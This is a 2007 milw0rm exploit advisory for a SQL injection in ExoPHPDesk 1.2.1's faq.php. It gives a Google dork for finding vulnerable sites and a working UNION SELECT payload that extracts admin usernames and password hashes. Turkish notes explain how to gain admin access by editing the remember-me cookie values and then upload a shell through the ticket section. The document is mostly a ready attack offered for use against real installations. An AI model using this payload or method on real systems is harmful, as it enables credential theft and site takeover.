1 *******************************************************************************
2 # Title : ExoPHPDesk <= 1.2.1 (faq.php) Remote SQL Injection Vulnerability
3 # Author : ajann
4 # Contact : :(
5 # S.Page : http://www.exoscripts.com
6 # $ : Free
7 # Dork : Powered by ExoPHPDesk v1.2 Final.
8 # DorkEx : http://www.google.com.tr/search?q=Powered+by+ExoPHPDesk+v1.2+Final.+&hl=tr&start=0&sa=N
9
10 # Info : \* Google aramasi sonucu admin kullanici adini ve hashlarini ele
11 gecirdiginizde md5 ile sifrelenmis hashi kirmamiza gerek yok.
12 Siteye uye olarak beni hatirla tarzi cookie ile girisimizi yaparak,
13 cookilerde tutulan UserName ve Pass’i degistererek , admin yetkisi
14 ile giris yapabilirsiniz.Daha sonra ticket bolumunden eger serverda
15 ayarlar tamsa(configdeki) shell sokabilirsiniz. /*
16
17 *******************************************************************************
18
19 [[SQL]]]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
20
21 http://[target]/[path]//faq.php?action=&type=view&s=&id=[SQL]
22
23 Example:
24
25 //faq.php?action=&type=view&s=&id=−1’%20union%20select%200,concat(char(85),char(115),char(101),char(114),char(110),ch
ar(97),char(109),char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),
char(119),char(111),char(114),char(100),char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/*
26
27 [[/SQL]]
28
29 """""""""""""""""""""
30 # ajann,Turkey
31 # ...
32
33 # Im not Hacker!
34
35 # milw0rm.com [2007−01−31]
Page 1/1
ExoPHPDesk 1.2.1 faq.php Remote SQL Injection Vulnerability
ajann
01/31/2007